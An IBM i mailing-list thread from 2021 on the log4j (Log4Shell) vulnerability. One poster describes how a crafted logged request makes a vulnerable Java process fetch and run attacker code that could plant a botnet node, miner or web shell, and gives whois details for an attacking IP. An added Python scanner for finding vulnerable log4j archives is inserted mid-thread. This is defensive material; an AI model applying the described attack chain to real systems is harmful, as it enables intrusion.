This is the type of request that I'm seeing against an apache web server. Not vulnerable in itself, but suppose I'm running a java application under WAS. Logging either within my application or with WAS using a vulnerable log4j version.
That will cause the process doing the logging to make a connection to the server running at 18.104.22.168 and execute the java code that it gets back. That code could run a couple system checks and just report back what it finds. Logging and inventorying exploitable systems so that the attacker can loop back and make a more sophisticated attack later. It could drop a small shell script in /tmp or the working directory of the app. It likely has write authority to those locations even if it is running under a profile like QTMHHTTP. That script could be a botnet node, a cryptominer, a web console.
Everyone is justifiably worked up about this because it allows remote code execution in a fairly trivial way, and the package that is being used in the exploit is very common in java applications. You know your software is safe, but my boss just knows we have software from vendor a, b, and c. He doesn't know if any of those vendors' products use java and the affected library. So my job was to look at all the software we have on our system, and determine if we have exposure. In our case on the IBM i, we have the admin servers, and one other product, but it appears to use the old 1.x log4j. That presents its own issues, but it's not exploitable by this attack.
FYI - this is who 22.214.171.124 belongs to:
org-name: IT Resheniya LLC
address: ul. Novoselov, d. 8A, of. 692
address: 193079 Saint Petersburg
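The exposure inventory the post describes, as an added example that is not code from this thread: a Python scanner that walks a directory of jar/war/ear files, recurses into archives bundled inside them, and reports whether each carries log4j 1.x or log4j-core 2.x, with the version read from its Maven pom.properties and whether JndiLookup.class (the class behind the JNDI lookup) is present. The marker entry names are the library's real paths; the sample archives that build_sample() writes are constructed for the demo, not vendor files.

```python
import io
import tempfile
import zipfile
from pathlib import Path
# Jar entries that identify which log4j generation is bundled (real class/resource paths).
LOG4J2_JNDI = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J2_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
LOG4J1_MARKER = "org/apache/log4j/Logger.class"
ARCHIVES = (".jar", ".war", ".ear", ".zip")

def _scan_zip(zf, origin, findings):
    names = set(zf.namelist())
    if LOG4J1_MARKER in names:
        findings.append((origin, "log4j-1.x", None, False))
    if LOG4J2_POM in names or LOG4J2_JNDI in names:
        props = zf.read(LOG4J2_POM).decode("utf-8", "replace").splitlines() if LOG4J2_POM in names else []
        version = next((p.split("=", 1)[1].strip() for p in props if p.startswith("version=")), None)
        # JndiLookup.class on the classpath is what makes the JNDI lookup reachable.
        findings.append((origin, "log4j-2.x", version, LOG4J2_JNDI in names))
    for name in names:  # recurse into bundled archives: war/ear files embed log4j-core
        if name.lower().endswith(ARCHIVES):
            data = io.BytesIO(zf.read(name))
            if zipfile.is_zipfile(data):
                with zipfile.ZipFile(data) as nested:
                    _scan_zip(nested, f"{origin}!{name}", findings)

def scan_path(root):
    """Return sorted (origin, family, version, jndi_present) tuples for log4j found under root."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVES and zipfile.is_zipfile(path):
            with zipfile.ZipFile(path) as zf:
                _scan_zip(zf, str(path.relative_to(root)), findings)
    return sorted(findings)

def build_sample(root):
    """Constructed sample, not vendor files: a war embedding log4j-core 2.x, a jar with log4j 1.x."""
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as z:
        z.writestr(LOG4J2_POM, "version=2.14.1\n")
        z.writestr(LOG4J2_JNDI, b"")
    with zipfile.ZipFile(Path(root) / "app.war", "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", core.getvalue())
    with zipfile.ZipFile(Path(root) / "legacy.jar", "w") as z:
        z.writestr(LOG4J1_MARKER, b"")

def demo():
    with tempfile.TemporaryDirectory() as d:
        build_sample(d)
        return scan_path(d)
```

Point scan_path() at a product's install directory (for example an IFS path on IBM i) to get the same report for real archives; the 2.x hits with jndi=True are the ones to patch or remediate first.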
On Wed, 2021-12-15 at 08:21 -0600, Brad Stone wrote:
Ya, I get this. I just find it funny I am getting all these emails from
customers asking me if my software is vulnerable (no java and no server
software, and if any web server is used it's the IBM apache which isn't
I don't think it's been explained well enough... it is complicated, yes,
but I think a good example would be the best description for those confused
by what's going on.
On Tue, Dec 14, 2021 at 5:38 PM Charles Wilt <charles.wilt@xxxxxxxxx> wrote:
Senior Programmer Analyst
MEDDATA / MEDTRON
120 Innwood Drive
Covington LA 70433
Toll Free: 877-893-2550